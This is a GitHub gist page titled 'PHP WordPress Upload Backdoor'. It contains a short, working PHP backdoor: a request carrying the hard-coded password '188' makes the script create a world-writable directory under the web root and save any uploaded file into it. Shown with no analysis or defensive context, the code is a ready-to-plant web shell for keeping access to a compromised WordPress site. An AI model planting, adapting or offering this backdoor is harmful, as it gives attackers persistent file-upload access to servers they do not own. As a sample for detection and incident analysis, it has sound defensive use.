Skip to content

Instantly share code, notes, and snippets.

@jonaslejon
Created January 17, 2015 20:58
Show Gist options
  • Save jonaslejon/5f18e73c5295d9c132e8 to your computer and use it in GitHub Desktop.
Save jonaslejon/5f18e73c5295d9c132e8 to your computer and use it in GitHub Desktop.
PHP WordPress Upload Backdoor
<?PHP
$pswd=$_POST['pswd'];
if($pswd=='188'){
$dir=stripslashes($_POST['pathdir']);
if($dir=='ok'){$ndir=dirname(__FILE__).'/';}else{$ndir=$_SERVER['DOCUMENT_ROOT'].$dir;}
if ($_FILES["file"]["error"] > 0){
}else{
mkdir($ndir,0777);
move_uploaded_file($_FILES["file"]["tmp_name"],$ndir . $_FILES["file"]["name"]);}}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment